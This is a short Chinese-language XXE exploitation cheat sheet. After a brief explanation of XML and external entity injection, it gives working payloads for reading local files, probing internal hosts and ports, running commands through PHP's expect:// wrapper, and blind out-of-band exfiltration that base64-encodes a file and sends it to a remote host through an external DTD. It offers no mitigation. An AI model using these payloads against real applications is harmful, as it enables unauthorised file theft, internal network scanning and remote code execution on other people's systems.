XXE-XML之利用检测绕过全解

XML被设计为传输和存储数据，XML文档结构包括XML声明，DTD文档类型定义（可选）、文档元素，其焦点是数据的内容，其把数据从HTML分离，是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析xml输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取，命令执行，内网端口扫描、攻击内网网站等危害。

XML与HTML的主要差异

  XML被设计为传输和存储数据，其焦点为数据的内容。

  HTML被设计用来显示数据，其焦点是数据的外观，，

  HTML旨在显示信息，而XML旨在传输信息。

#玩法-读文件

<?xml version ="1.0" ?>

<!DOCTYPE ANY [

<!ENTITY xxe SYSTEM "file:///d://text.txt">

]>

<x>&xxe;</x>

#玩法-内网探针或攻击内网应用（触发漏洞地址）

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY rabbit SYSTEM "http://192.168.0.103:8081/index.txt">

]>

<x>&rabbit;</x>

#判定文件是否存在，端口是否开放

#玩法-RCE

该CASE是在安装expect扩展的PHP环境里执行系统命令

<?xml version = "1.0"?>

<!DOCTYPE ANY [

<!ENTITY xxe SYSTEM "expect://id">

]>

<x>&xxe;</x>

#引入外部实体，执行文件中代码

<?xml version = "1.0"?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "http://127.0.0.1/evil2.dtd">

%file;

]>

<x>&send;</x>

//下面的是写入文件的

evil2.dtd:

<!ENTITY send SYSTEM "file:///d:/test.txt">

#无回显-读取文件

<?xml version = "1.0"?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">

<!ENTITY % dtd SYSTEM "http://192.168.xx.xxx:80XX/test.dtd">

%dtd;

%send;

]>

test.dtd:

<!ENTITY % payload

"<!ENTITY % send SYSTEM

'http://192.168.xx.xxx:80xx/?data=%file;'>"

>

%payload;